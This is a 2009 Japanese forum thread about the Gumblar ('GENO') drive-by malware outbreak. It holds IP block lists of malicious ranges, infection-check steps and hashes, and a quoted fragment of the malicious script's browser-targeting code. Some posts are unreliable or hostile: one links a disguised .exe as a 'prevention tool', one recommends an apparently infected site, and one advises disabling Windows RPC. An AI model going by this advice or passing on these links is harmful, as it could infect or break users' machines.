【ネットでも】GENOウィルス亜種が爆発的に増殖か 小林製薬や同人サイト他中心に感染も★5【新型ウィルス拡散中】

このエントリーをはてなブックマークに追加
1 ドデカテオン メディア(catv?)

javascript切っていても感染のするとの事

詳しくは↓で以下略

GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

GENOウイルススレ ★10
http://pc11.2ch.net/test/read.cgi/sec/1242504332/
【管理も】同人サイト・GENOウィルス注意5【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242503523/
【Genoウィルス総合スレ】ニフティのオンラインウィルスチェックをする→感染
http://namidame.2ch.net/test/read.cgi/poverty/1242359071/
【ネット】 小林製薬ウェブサイトの一部でサイト改ざん、現在は閉鎖  閲覧者にはウイルス感染の恐れ [09/05/12]
http://anchorage.2ch.net/test/read.cgi/bizplus/1242271601/
【ネットでも】GENOウィルス亜種が爆発的に増殖か 小林製薬や同人サイト他中心に感染も★4【新型ウィルス拡散中】
http://tsushima.2ch.net/test/read.cgi/news/1242521524/

前スレ
【ネットでも】GENOウィルス亜種が爆発的に増殖か 小林製薬や同人サイト他中心に感染も★5【新型ウィルス拡散中】
http://tsushima.2ch.net/test/read.cgi/news/1242541194/
2 キブシ(東京都):2009/05/17(日) 19:17:02.58 ID:lkGVu3aj
あうあうあー(^q^)ノ
3 水芭蕉(福岡県):2009/05/17(日) 19:17:05.77 ID:qrwxe2qC
小林製薬の糸ようじ
4 ヤマボウシ(北海道):2009/05/17(日) 19:17:36.29 ID:ueN9y89n
小林製薬の糸ようじ
5 モリシマアカシア(関西地方):2009/05/17(日) 19:18:13.17 ID:+MGVg9A6
http://geno.2ch.tc/
GENOウイルスチェッカー
出力結果は↓

Jane使っている人は
ツール-設定-コマンドで
コマンド名 適当
実行するコマンドに http://geno.2ch.tc/index.php?url=$TEXT$LINK
ってやるとなぞり検索でチェックできる



http://geno.2ch.tc/index.php?url=www.ribbonmagic.com%2F
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。

まだ駄目だよ
6 キブシ(東京都):2009/05/17(日) 19:18:30.05 ID:lkGVu3aj
対策

Flash PlayerとPDFリーダーを最新のものにする

おわり(^q^)
7 水芭蕉(アラバマ州):2009/05/17(日) 19:18:33.43 ID:963+B9KC
>>1
おせーよ
8 カタクリ(千葉県):2009/05/17(日) 19:18:58.24 ID:KLsPwtoF
俺、決してNGを使わないで糞コテもちゃんと見る派だったのに、
今回だけは入れてやるんだ。NG。
9 フジスミレ(神奈川県):2009/05/17(日) 19:19:06.32 ID:PZkuIYEZ
ネットカフェとか店先のPCとかな
10 ネメシア(関東地方):2009/05/17(日) 19:19:25.61 ID:exjCFmyF
>>1
★6だろ
11 ヤマエンゴサク(catv?):2009/05/17(日) 19:19:31.82 ID:0vDAVPGR
>>6
VistaユーザーならUAC有効にしてればおk
1か月前に液晶のバックライトが切れたから買い替えて良かったかも
12 ジュウニヒトエ(愛知県):2009/05/17(日) 19:20:02.74 ID:WrzWstps
ノートかよ
13 ダンコウバイ(アラバマ州):2009/05/17(日) 19:21:34.81 ID:RcGGQGDi
なんで5なの?
14 ドデカテオン メディア(catv?):2009/05/17(日) 19:22:26.80 ID:NijB5Tnh BE:955689784-PLT(16000)

6だと思ってくれ。
15 オウレン(山口県):2009/05/17(日) 19:22:28.82 ID:TbUW2CvG
>>13
なんでもいいじゃん
16 チチコグサ(アラバマ州):2009/05/17(日) 19:22:53.84 ID:00pmgETL
一目で判るGENOたんの一日☆

こんにちは、GENOっていいます (幼女ウイルス)    第一感染

あっ、また会ったね、お兄ちゃん。それじゃあ遊ぼっか! 再起動で発動

お姉ちゃん、こっちで一緒に遊ぼうよ!        勝手に海外のサイトからお姉ちゃんウイルスDL
姉「うっしゃ暴れるぞ」

もうあたし一人でだいじょうぶだもん!       再起動で不老の無敵幼女発動

お兄ちゃんの家に行きたいな〜……        知らずにサイト更新する

へぇ〜、お兄ちゃん家って、こんな鍵使ってるんだぁ。  FTPパス送信

えへへ、合鍵、作っちゃった♪
あ、お隣さんが回覧板届けに来てあたしの事尋ねてきたから
お嫁さんですって言っちゃった!えへへ           BOTがサイトに不正アクセスして改竄

えへへ、本当にお嫁さんになっちゃったね♪
野球チームできるくらい、いーっぱい子供作ろうねっ♪            自分のサイトがもれなく幼女ウイルス配布

上に戻る
17 オランダミミナグサ(長屋):2009/05/17(日) 19:23:31.08 ID:JmDW7GMT
ビスタなんだけど、何もしてないのにHDDにアクセスまくってるんだけどウイルスかかったのかえ?
18 プリムラ・ヒルスタ(埼玉県):2009/05/17(日) 19:24:05.18 ID:W7zECwLz
まさかのVista厨の逆襲
セキュリティ強化したゲイツの勝利だな

7のUACがクソと呼ばれる日も近いか
19 水芭蕉(アラバマ州):2009/05/17(日) 19:24:34.20 ID:963+B9KC
>>17
もう捨てたほうがいい
20 アネモネ・ブランダ(長屋):2009/05/17(日) 19:25:29.38 ID:1ErMdupP
>>17
よくある
21 カンパニュラ・アーチェリー(東日本):2009/05/17(日) 19:25:34.78 ID:9PDqnnz3
730 : リナリア アルピナ(中部地方):2009/05/17(日) 14:08:06.53 ID:PA1MHOB9
すまん、流れ読まずに投下
gnome氏のzlkon/gumblarサイトを参考に作ったんで防止策の一つとして貼っておく
・サーバがちょくちょく変わる性質なので今後の動向に注意
・一番上のmartuz.cnはNEW
・行頭の"HiPr-"はgnome氏が緊急(High Priority)と書いてるもの
・言うまでもないが、IP範囲最終決定とか使用は自己責任で

HiPr-NEW martuz.cn - 2009.05.16 (95.129.144.0/23) :95.129.144.0-95.129.145.255
HiPr- Botnet C&C by Gumblar - 2009.05.09 (78.109.16.0/20) :78.109.16.0-78.109.31.255
HiPr- gumblar relative 2009.05.07 (213.182.192.0/19) :213.182.192.0-213.182.223.255
HiPr- gumblar - 2009.05.02 (94.229.64.0/20) :94.229.64.0-94.229.79.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (206.44.0.0/16) :206.44.0.0-206.44.255.255
Malware Injection 2009.05.06 (91.211.64.0/23) :91.211.64.0-91.211.65.255
basesrv3.net - 2009.05.03 (91.212.41.0/24) :91.212.41.0-91.212.41.255
Malware Injection 2009.05.06 (91.212.65.0/24) :91.212.65.0-91.212.65.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (85.17.0.0/16) :85.17.0.0-85.17.255.255
autobestwestern.cn - 2009.05.13 (85.214.90.0/24) :85.214.90.0-85.214.90.255
gumblar via e-mail - 2009.05.12 (74.220.215.0/24) :74.220.215.0-74.220.215.255
zlkon another-type 2009.05.03 (212.117.160.0/19) :212.117.160.0-212.117.191.255
zlkon.lv -- 2009.04.05 (94.247.2.0/23) :94.247.2.0-94.247.3.255
http://tsushima.2ch.net/test/read.cgi/news/1242521524/730
22 プリムラ・マラコイデス(catv?):2009/05/17(日) 19:25:38.29 ID:tTs2xyC/
感染予防対策(1)

1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

1.Adobe Readerを起動し「編集」メニューの「環境設定」
  「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
  OKを押して設定確定後、Adobe Readerを終了。

2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
  設定は SpeedUp - Fast がおすすめ。
   注意すべきは
   Acroform(拡張子なし)
   Annotations(拡張子なし)
   これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
   そうしないと Adobe Reader が起動しなかったりする。

   このとき追加作業として
   EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
   より安心かもしれない。
23 スズナ(埼玉県):2009/05/17(日) 19:25:47.20 ID:Gax1nOD3
まとめサイト重いぞ

あとGEONのイメージ悪くなるぞ
お前等許されないぞ
24 菜の花(山形県):2009/05/17(日) 19:25:54.97 ID:ImXjuYM0
感染チェックツール
http://www.seibidoshuppan.co.jp 36635.txt.html
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
txtをbatにして実行
25 カンパニュラ・アーチェリー(東日本):2009/05/17(日) 19:26:26.82 ID:9PDqnnz3
239 :名無しさん@お腹いっぱい。:2009/05/15(金) 02:39:15
最近流行のgumblar関連の焼き推奨一覧

hostflesh:58.65.232.0-58.65.239.255
nicovedeo:61.139.0.0-61.139.127.255
chunghwa:61.219.39.0-61.219.39.255
chinarailway1:61.235.117.0-61.235.117.255
chinarailway2:61.237.236.0-61.237.236.255
fakeav:63.146.2.0-63.146.2.255
hivelocity:69.46.0.0-69.46.31.255
bluehost:74.220.215.0-74.220.215.255
datacenterhosting:78.109.16.0-78.109.31.255
netdirect:78.159.112.0-78.159.115.255
fakevideo:82.146.48.0-82.146.55.255
xs4all:83.68.16.0-83.68.16.255
xentronix:85.12.43.0-85.12.43.255
colocation:85.14.6.0-85.14.6.255
leaseweb:85.17.0.0-85.17.255.255
strato:85.214.90.0-85.214.90.255
gaztranzitstroyinfo-net1:91.211.64.0-91.211.65.255
gaztranzitstroyinfo-net2:91.212.41.0-91.212.41.255
gaztranzitstroyinfo-net3:91.212.65.0-91.212.65.255
bastiontradegroup:94.232.248.0-94.232.255.255
gumblar-russian:94.229.64.0-94.229.79.255
zlkon.lv:94.247.2.0-94.247.3.255
madet:195.2.252.0-195.2.253.255
americanstandard:206.44.0.0-206.44.255.255

1/2
http://pc11.2ch.net/test/read.cgi/sec/1228949365/239-240
26 カタクリ(千葉県):2009/05/17(日) 19:26:46.59 ID:KLsPwtoF
>>17
Vistaに標準でついてる児童デフラグがとまらないで終わってるんだと思えばいい。
27 プリムラ・ヒルスタ(埼玉県):2009/05/17(日) 19:27:15.99 ID:W7zECwLz
>>26
普段どんな単語打ってるんだお前は
28 カンパニュラ・アーチェリー(東日本):2009/05/17(日) 19:27:29.88 ID:9PDqnnz3
240 :名無しさん@お腹いっぱい。:2009/05/15(金) 02:39:58
zbot1:209.44.100.0-209.44.100.255
zbot2:209.44.126.0-209.44.126.255
zbot3:209.62.7.0-209.62.7.255
zbot4:209.102.247.0-209.102.247.255
zbot5:209.250.241.0-209.250.241.255
zeus1:209.44.96.0-209.44.127.255
zeus2:82.146.50.202
pacnet1:209.205.192.0-209.205.223.255
pacnet2:209.205.224.0-209.205.239.255
chinaunicom:211.90.0.0-211.97.255.255
zlkon:212.117.160.0-212.117.191.255
latvia:213.182.192.0-213.182.223.255
vundo1:216.39.48.0-216.39.63.255
vundo2:216.39.62.0-216.39.62.255
chinanet:218.90.0.0-218.94.255.255

2/2
http://pc11.2ch.net/test/read.cgi/sec/1228949365/239-240
29 プリムラ・マラコイデス(catv?):2009/05/17(日) 19:27:43.32 ID:tTs2xyC/
感染予防対策(2)
危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader&各ポートの環境設定をどうするかも各自考える必要があります。
30 ハナワギク(新潟・東北):2009/05/17(日) 19:29:02.65 ID:1oH/gZoc
>>26
初潮のことかー!
31( ● ´ ー ` ● ) はスバラシイ:2009/05/17(日) 19:29:28.61 ID:k92X7j1c BE:4495542-PLT(12000)

小林製薬とか普通にCMしてるけど、差し替えて謝罪CM入れるべきなんじゃないの?

まあ、銀イオン詐欺やってる犯罪企業にとってみれば
たいした問題じゃないのかもだけど
32 シャクナゲ(dion軍):2009/05/17(日) 19:30:58.52 ID:2S78G9Tr
ubuntuのサブ機使お
しかし重いお…
33 キブシ(catv?):2009/05/17(日) 19:31:07.58 ID:w8KdrlSp
で、niftyの話はどうなったんだ?
34 キブシ(東京都):2009/05/17(日) 19:32:30.13 ID:lkGVu3aj
>>29
RPCを無効にする…だと…(゚q゚)?
35 クレマチス・モンタナ(アラバマ州):2009/05/17(日) 19:32:57.26 ID:C6RccPNs
VistaはUACオンなら、IEの保護モードで守りは鉄壁に近いはず
36 サンシュ(長屋):2009/05/17(日) 19:33:04.70 ID:w2uGYIbu
そもそも製薬企業というより、雑貨みたいなもんだよな・・。
37 イベリス・ウンベラタ(西日本):2009/05/17(日) 19:34:04.45 ID:J54oGTbS
実行された場合、ウイルス対策ソフト入れてれば殆どどれでもアラート反応する
反応したスクリプトを許可するなんてバカなことしなければ感染しない
38 カラスビシャク(埼玉県):2009/05/17(日) 19:34:51.69 ID:4sYNvOMI
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
http://www.seibidoshuppan.co.jp/
何をすれば良いか良く分からない人用のまとめ

■よくある質問>>1
■主な症状 >>5
■自ジャンルで発見した場合
→まとめページを見て、重複がない場合は>>4

※まとめサイトの方が拾いやすいように、
まとめサイトへの報告他は、必ず>>1
アンカーを入れて報告してください。

GENOウィルスことGumblarの報告してくれてるブログ
ttp://www3.atword.jp/gnome/tag/zlkon/
あと非同人向けまとめサイト
ttp://www29.atwiki.jp/geno/
39 ホトケノザ(コネチカット州):2009/05/17(日) 19:35:14.28 ID:s2pS2D1S
981 イワウチワ(大阪府) sage 2009/05/17(日) 19:28:23.11 ID:j5QqoQFP
>>868

これもChromeチェックがあるのを確認した
スクリプトではChromeを除外、つまりChromeの時はスルー


ブラウザがクロームならGENOに感染しないってこと?
40 キュウリグサ(福岡県):2009/05/17(日) 19:35:58.15 ID:QQkT0wna
XPで踏んでみるから
検証してほしいことがあったら言ってくれ
41 フデリンドウ(アラバマ州):2009/05/17(日) 19:35:58.08 ID:5GYYwEGs
>>31
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
42 ノゲシ(栃木県):2009/05/17(日) 19:36:24.73 ID:Nj5QC+P5

> ブラウザがクロームならGENOに感染しないってこと?
俺、前クロームでGENO踏んだけど、クロームが落ちるだけで感染しなかったんだよね。
43 ハナワギク(群馬県):2009/05/17(日) 19:36:50.94 ID:i0sh18L4
同人サイトって販売してるようなサイト?
44 シャクナゲ(dion軍):2009/05/17(日) 19:37:00.66 ID:2S78G9Tr
>>38
>■何をしたらいいか分からない人はまずここを見る。
>→ww.seibidoshuppan.co.jp/
>何をすれば良いか良く分からない人用のまとめ


★★★おそらく感染サイトなので注意 罠です★★★
45 オウレン(山口県):2009/05/17(日) 19:37:02.34 ID:TbUW2CvG
>>40
デイリーポータル見てきて
46 スズナ(東京都):2009/05/17(日) 19:37:12.76 ID:VZD8/13g
漏れのブラウザはChromiumなので感染しないのかな?
なら安心してネットできる
47 クマガイソウ(奈良県):2009/05/17(日) 19:37:34.17 ID:qcyU8BPc
286 名前:以下、名無しにかわりましてVIPがお送りします[sage] 投稿日:2009/05/17(日) 19:23:09.84 ID:9JkQNPk40
881 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:19:07
ダム板から着ました。

Chrome対応の亜種が出たっぽい予感。

884 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:19:47
>>881
ソース


890 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:22:10
>>884
個人のサイトだったからスレで。
http://tsushima.2ch.net/test/read.cgi/news/1242541194/935
48 ショウジョウバカマ(三重県):2009/05/17(日) 19:38:02.43 ID:M5Qp0TJq
>>38
ワロタ
49 フデリンドウ(アラバマ州):2009/05/17(日) 19:38:10.86 ID:5GYYwEGs
>>40
できれは、IE6、IE7、IE8の場合わけで。
50 スズナ(埼玉県):2009/05/17(日) 19:38:21.96 ID:4QuIVfhI
>>44
危険度1000%
超絶危険なURLです。友人の(ry
絶対に踏んではいけません。
51 キュウリグサ(福岡県):2009/05/17(日) 19:38:50.39 ID:QQkT0wna
>>45
おk
じゃあ>>45の感染してそうなURLくれ
52 カラスビシャク(埼玉県):2009/05/17(日) 19:38:59.13 ID:4sYNvOMI
νカスのくせにつまんねーなおい
53 クチベニシラン(埼玉県):2009/05/17(日) 19:39:38.27 ID:X6dMpG99
デイリーポータル感染してたら困る
54 オウレン(山口県):2009/05/17(日) 19:40:01.26 ID:TbUW2CvG
55 キュウリグサ(福岡県):2009/05/17(日) 19:40:27.95 ID:QQkT0wna
>>49
ブラウザのバージョンごとの検証か・・・
これ簡単にやる方法ってある?
56 イワウチワ(大阪府):2009/05/17(日) 19:40:38.58 ID:j5QqoQFP
>>47

Chrome除外指定でChromeの時はスルーだと思うんだ
つまりウイルス起動しない
57 ホトケノザ(コネチカット州):2009/05/17(日) 19:40:37.94 ID:s2pS2D1S
>>42
ありがとう
UCA入れてたのにろくに相手していなかったから
すごく不安だったけど安心しました
58 ツボスミレ(愛知県):2009/05/17(日) 19:40:50.90 ID:udK8d9qw
>>41
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】

    論外

・GENO(PC通販ショップ)【証拠隠滅済】

これ位やるべきだろ
59 コメツブツメクサ(関東・甲信越):2009/05/17(日) 19:40:54.97 ID:9r57wE3r
pixivはまだかー
60 スズナ(アラバマ州):2009/05/17(日) 19:41:13.31 ID:jJW7D3CE
>>55
仮想OSなら
61 チューリップ(千葉県):2009/05/17(日) 19:41:39.87 ID:3XriMO3d
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |
       ____.____    | .__  いらないPCを
     |        |        |   | |\_\  窓から
     |        | ∧_∧ |   | |  |.◎.| 投げ捨てろ
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄
62 キュウリグサ(福岡県):2009/05/17(日) 19:41:40.44 ID:QQkT0wna
>>54
     ヘ⌒ヽフ
    ( ・ω・) dd!
    / ~つと)
63 ビオラ(茨城県):2009/05/17(日) 19:42:15.09 ID:7tdmFQrU
てか2ch以外で話題になってないね。
GENOの風評被害だとかいって自粛してるのかね?
64 セントランサス(福岡県):2009/05/17(日) 19:42:25.67 ID:8fJCqosV
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認
65 クヌギ(埼玉県):2009/05/17(日) 19:42:26.05 ID:A0zthT+g
危険度の%の数字の根拠は何だ
66 スズナ(栃木県):2009/05/17(日) 19:42:38.29 ID:gVr2iNRx
ニフティって結局なんだったのよ
俺はアクセスしたけど感染しなかったぞ
アクセスしたのは昨日だけど
67 スズナ(東京都):2009/05/17(日) 19:42:45.91 ID:VZD8/13g
DPZ危険度1pt
68 マツバウンラン(コネチカット州):2009/05/17(日) 19:42:55.19 ID:/k6fqCn1
中古本売ってる某サイトも感染しとる
69 キュウリグサ(福岡県):2009/05/17(日) 19:43:21.90 ID:QQkT0wna
>>60
今まさにそれでやってるんだが
今の仮想環境が8G越えだからコピーに時間かかるんだよなw
まっいっか一個一個やってみるよ
70 サンシュ(東京都):2009/05/17(日) 19:43:24.07 ID:TVbfxF0n
一次ソースたる情報が無い上に一次ソースらしきURL貼られても感染が怖くて踏めない
恐怖が人を支配する
71 セントランサス(福岡県):2009/05/17(日) 19:43:40.63 ID:8fJCqosV
正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3

上書きされたsqlsodbc.chmの例(あくまで例でありこの限りではない)
ファイルサイズ:1,323 バイト
CRC32:7585CBB6
MD5:BF7209B9589AD09A25740F6D47D0ADEA
SHA-1:D695F957AA9DEB0E4D92F4546DB3A883B1909008
72 ライラック(大阪府):2009/05/17(日) 19:43:53.46 ID:XYK9Bse7
>>66
誰も触ってない時点でわかるだろ
完全なデマで結論でてる

ちなみにスレ立てた奴はsakuられた
73 ムシトリナデシコ(東京都):2009/05/17(日) 19:44:04.69 ID:uCO7tBua
このスレのURLは踏まない
74 ヤマエンゴサク(神奈川県):2009/05/17(日) 19:44:09.30 ID:t+fnFwNR
結局、アドビ関連をアップデートしまくればいいの?
75 オステオスペルマム(アラバマ州):2009/05/17(日) 19:44:13.40 ID:9B2x1c99
2ちゃんのスレで対策をコピペされても信憑性がまったくないんだよな。
読む気にもならん。
さっさとウィルスを検出可能なオンラインスキャンをかけたほうが早いだろw
76 スズナ(埼玉県):2009/05/17(日) 19:44:20.71 ID:4QuIVfhI
>>68
どこ?
77 リナリア アルピナ(神奈川県):2009/05/17(日) 19:44:21.21 ID:M37MAfgQ
まとめサイト見るの怖いから
具体的サイト名を教えろ
78 フデリンドウ(アラバマ州):2009/05/17(日) 19:44:24.34 ID:5GYYwEGs
>>55
IE7かIE8だと感染しない可能性のある
レスをみた。これから探すから、ちょっと待ってくれ。
79 サンダーソニア(東京都):2009/05/17(日) 19:44:34.50 ID:Qtky1iiK
ネット見るのはMacでいいだろ
80 セントランサス(福岡県):2009/05/17(日) 19:44:42.67 ID:8fJCqosV
15 名前:genoウイルス被害者の会”管理”人[] 投稿日:2009/05/17(日) 03:13:20.26 ID:BRx1b5y4P
大事な事思い出した

【コマンドプロンプトが開かない】
↑これは感染の判断基準になるけども、
感染初期(除去可能な時期)にコマンドプロンプトを開くと
一気に親玉感染して重症化する。

安易にDOS窓ひらいちゃだめだ

92 名前:genoウイルス被害者の会”管理”人[] 投稿日:2009/05/17(日) 03:26:16.11 ID:BRx1b5y4P

おまえら c m d を 起 動 す る な

感染してたらコレが命取りになるよ

感染の確認ならレジストリエディタを開けるかでいい
DOS窓で確認しちゃいかん 絶対。
81 フクシア(神奈川県):2009/05/17(日) 19:45:28.61 ID:cZ85gIrd
てかGENOウィルスってなんだよまるでPC通販GENOが諸悪の根源みたいじゃないか
82 セントランサス(福岡県):2009/05/17(日) 19:45:40.14 ID:8fJCqosV
>>38
ワロタ
83 ハチジョウキブシ(神奈川県):2009/05/17(日) 19:45:40.63 ID:KSpMgKu1
>>16
わかりづれえ
84 ツボスミレ(愛知県):2009/05/17(日) 19:45:57.35 ID:udK8d9qw
初期のGenoウイルスと比べてはるかに進化してるな・・・・・・
85 スズナ(アラバマ州):2009/05/17(日) 19:46:39.07 ID:ABIJ2zfn
>>81
多分わざと言ってるんだろうが
ある意味そうだろ

まあ、感染してる奴って思ったより多くない
局地的現象なんじゃないかとは思ってるが
86 藤(東京都):2009/05/17(日) 19:46:52.91 ID:++//WVOB
>>38
seibidoのURL踏んだらavastが鳴ったぞ
87 ヒサカキ(長屋):2009/05/17(日) 19:46:56.43 ID:PpDa/RmV
なるほど
それでアクロバットリーダーがあわてて9.1にウプしたんだ
88 ヒヤシンス(神奈川県):2009/05/17(日) 19:48:25.84 ID:eoG0Zm4h
パソコン蛾ぶっ壊れた
89:2009/05/17(日) 19:48:32.04 ID:fzWpD+g0
90 西洋オキナグサ(アラバマ州):2009/05/17(日) 19:49:06.18 ID:pcmoTSzk
>>86
やっちまったな・・・
91 フデリンドウ(アラバマ州):2009/05/17(日) 19:49:08.39 ID:5GYYwEGs
>>55
ごめん。記憶違いだった。

555 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:30:25
単にIEとFirefoxで挙動が違うだけで
Firefoxも食らうんじゃね

583 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:35:13
>>555
いや、いろいろスクリプト見たけど、ScriptEngineのバージョンチェックしてて、
対象をIE7以下のjscript.dllに絞ってるのしか見たことないんだよね。

Firefoxを対象にしているスクリプトがあるのなら、そのスクリプトを
拾いたいんだけど、見つからない。
92 マツバウンラン(コネチカット州):2009/05/17(日) 19:49:55.36 ID:/k6fqCn1
危険度100000000000
93 カラスビシャク(埼玉県):2009/05/17(日) 19:50:22.33 ID:4sYNvOMI
同人だと大量に釣れるから面白い
94 アヤメ(神奈川県):2009/05/17(日) 19:50:33.93 ID:rG8cwPZp
これはそんなに怖いもんじゃないだろ。
接続状況の監視しておけばいいだけだし。
95 フデリンドウ(アラバマ州):2009/05/17(日) 19:51:27.74 ID:5GYYwEGs
>>91
532 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:26:33
なんかアレな情報が流れてるな…
スクリプトはIEとそれ以外で別のコードを返すけど
Firefoxも普通に攻撃対象に入ってる

548 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:29:31
>>532
jscript.dllのバージョンチェックが入ってるから、実質的にIE7以下しか
攻撃対象になっていないように思うんだが、Firefoxが対象になってる
スクリプトが埋め込まれているサイトがあったら教えて。踏みに行くから。

586 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:35:24
>>548
どれも同じだよ。>>324
確かにjscript.dllのバージョンチェックが入ってるんだけど、
これはobjectタグで返すかembedタグで返すかを判別するだけのコードのように思う。
96 ペチュニア(アラバマ州):2009/05/17(日) 19:51:59.93 ID:kILx2QCt
薬事日報の詳細報告ページが消えてるな。
現時点では一番詳しくて分かりやすかったのに。

Googleキャッシュが残ってたから貼っとく。
http://72.14.235.132/search?q=cache:KJGRCWkLccAJ:www.yakuji.co.jp/books/catalog/product_info.php/%3Fproducts_id%3D203+薬事日報&cd=2&hl=ja&ct=clnk&gl=jp&lr=lang_ja

こんなご時勢だから、念のため上のIPアドレスのWhois結果も貼っとく。
http://whois.ansi.co.jp/?key=72.14.235.132
97 キュウリグサ(福岡県):2009/05/17(日) 19:52:32.09 ID:QQkT0wna
>>91
おっ!サンクス

まぁいろいろまぁいろいろと試してみるよ


現在検証するブラウザ
IE6
IE7
IE8
Firefox最新版
Opera最新版
Chome最新版

こんなところかな?
98 ヤエヤマブキ(和歌山県):2009/05/17(日) 19:52:38.25 ID:BHu037V6
感染予防ツール置いておきますね
http://mj.dip.jp/jlab-beer/s/test0000.jpg.kintama.exe
99 藤(東京都):2009/05/17(日) 19:52:39.74 ID:++//WVOB
>>90
avastは心配スンナって言ってくれたよ
100 リナリア(catv?):2009/05/17(日) 19:53:26.00 ID:tKod5V+I
まるでエヴァみたいだな
101 フデリンドウ(アラバマ州):2009/05/17(日) 19:53:48.54 ID:5GYYwEGs
>>95
680 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:58:32
var j = "", u = navigator.userAgent;

if(
     (u.indexOf("Chrome")<0) &&      //Chrome以外ならtrue
     (u.indexOf("Win")>0) &&        //Windowsならtrue
     (u.indexOf("NT 6")<0) &&       //WindowsNT6以外ならtrue(XPはNT5.1、VistaはNT6.0)
     (document.cookie.indexOf("miek=1")<0) &&
     (typeof(zrvzts)!=typeof("A"))
){
     zrvzts="A";
     if(window.ScriptEngine){ //IEのVBscriptが実行できるならtrue
